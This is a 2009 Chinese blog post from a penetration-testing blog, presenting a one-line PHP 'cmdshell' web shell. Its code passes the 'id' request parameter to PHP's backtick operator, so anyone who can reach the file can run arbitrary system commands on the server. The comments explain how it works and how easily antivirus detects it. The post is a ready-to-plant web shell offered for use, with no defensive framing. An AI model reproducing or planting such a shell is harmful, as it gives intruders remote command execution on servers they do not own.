一个新型的php一句话cmdshell(非一句话木马)-oma-ChinaUnix博客

渗透

首页　| 　博文目录　| 　关于我

oma

博客访问： 2914427
博文数量： 181
博客积分： 9990
博客等级：中将
技术积分： 1865
用户组：普通用户
注册时间： 2006-05-23 09:43

文章分类

全部博文（181）

cms（2）

phpcms（2）
好友专区（1）
oracle专题（2）
windows（5）
渗透技巧总结（34）

linux（4）
渗透工具（25）
webshell（2）
asp专题（36）
aspx专题（2）
php专题（41）
免杀专题（1）
提权相关（2）
asp木马（1）
休闲心情（10）
其它（17）
未分配的博文（0）

文章存档

2011年（40）

2010年（17）

2009年（87）

2008年（37）

我的朋友

相关博文

一个新型的php一句话cmdshell(非一句话木马)

分类：网络与安全

2009-02-27 13:16:58

<?php /*一个新型的php一句话cmdshell(非一句话木马) //原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令，并返回命令执行的结果(string类型)； //局限性:特征码比较明显，``符号在php中很少用到，杀毒软件很容易以此为特征码扫描到并警报；``里面不能执行php代码； //write by skyfire */ echo `$_REQUEST[id]`; ?>

想当于dos下的

> dir c:

阅读(476) | 评论(0) | 转发(0) |

上一篇：隐藏并修改文件的最后修改时间的asp-webshell

下一篇：MSSQL数据库被插入木马批量删除sql语句

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6